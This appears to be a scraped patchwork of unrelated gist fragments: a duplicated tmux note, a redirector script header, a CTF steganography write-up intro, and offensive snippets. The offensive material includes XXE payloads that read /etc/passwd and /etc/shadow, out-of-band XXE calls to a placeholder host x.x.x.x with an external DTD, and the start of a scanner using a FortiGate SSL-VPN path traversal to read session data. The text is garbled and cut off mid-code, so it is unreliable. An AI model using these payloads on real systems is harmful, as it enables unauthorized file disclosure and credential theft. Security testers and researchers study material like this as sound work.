As configured in my dotfiles.
start new:
tmux
start new with session name:
As configured in my dotfiles.
start new:
tmux
start new with session name:
-------------------------------------------------------------- | |
Vanilla, used to verify outbound XXE or blind XXE | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
#!/usr/bin/env python | |
""" | |
Simple HTTP URL redirector | |
Shreyas Cholia 10/01/2015 | |
usage: redirect.py [-h] [--port PORT] [--ip IP] redirect_url | |
HTTP redirect server | |
positional arguments: |
from PIL import Image | |
import sys | |
# Team RTFM - Red Team Freakin' Maniacs - rtfm-ctf.org | |
# Writeup - We also have memes!- 3DS-CTF | |
#Playing another CTF, our team discovered an awesome algorithm to hide messages in a PNG file. | |
#One member of the team said that it is possible to improve the algorithm to make it impossible to retrieve the original message directly. So he hid a message in this meme and gave it to us to solve. | |
#Prove that he's wrong! |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> |
<?xml version=”1.0"?> | |
<!DOCTYPE data [ | |
<!ELEMENT data (#ANY)> | |
<!ENTITY file SYSTEM “file:///etc/passwd”>]> | |
<data>&file;</data> | |
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> | |
xxe.dtd: |
import requests, binascii, optparse | |
from urlparse import urlparse | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
requests.packages.urllib3.disable_warnings() | |
import multiprocessing | |
def checkIP(ip): | |
try: | |
url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" |